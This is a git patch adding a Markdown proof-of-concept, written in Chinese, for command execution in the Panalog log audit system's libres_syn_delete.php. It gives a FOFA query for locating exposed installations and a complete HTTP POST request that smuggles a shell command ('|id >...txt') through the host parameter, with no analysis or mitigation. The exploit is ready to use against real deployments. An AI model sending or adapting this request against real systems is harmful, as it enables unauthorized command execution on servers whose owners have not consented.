From 9583083ad2359a37f133425f3e7e68e789032002 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 18 Feb 2024 15:06:25 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Panalog=E5=A4=A7=E6=95=B0=E6=8D=AE?= =?UTF-8?q?=E6=97=A5=E5=BF=97=E5=AE=A1=E8=AE=A1=E7=B3=BB=E7=BB=9Flibres=5F?= =?UTF-8?q?syn=5Fdelete.php=E5=AD=98=E5=9C=A8=E5=91=BD=E4=BB=A4=E6=89=A7?= =?UTF-8?q?=E8=A1=8C.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...志审计系统libres_syn_delete.php存在命令执行.md | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 Panalog大数据日志审计系统libres_syn_delete.php存在命令执行.md diff --git a/Panalog大数据日志审计系统libres_syn_delete.php存在命令执行.md b/Panalog大数据日志审计系统libres_syn_delete.php存在命令执行.md new file mode 100644 index 0000000..cf85458 --- /dev/null +++ b/Panalog大数据日志审计系统libres_syn_delete.php存在命令执行.md @@ -0,0 +1,24 @@ +## Panalog大数据日志审计系统libres_syn_delete.php存在命令执行 + + +## fofa +``` +app="Panabit-Panalog" +``` + +## poc +``` +POST /content-apply/libres_syn_delete.php HTTP/1.1 +Host: +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Content-Length: 54 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: application/x-www-form-urlencoded + +token=1&id=2&host=|id >2cWKiiWovWYAIcNUBPkZph4xPLs.txt +``` +![image](https://github.com/wy876/POC/assets/139549762/44588f4b-2c3a-45c6-bc27-951795c2d64b) + +![image](https://github.com/wy876/POC/assets/139549762/90d69ec6-1058-4563-b02f-0721a1c68e8f)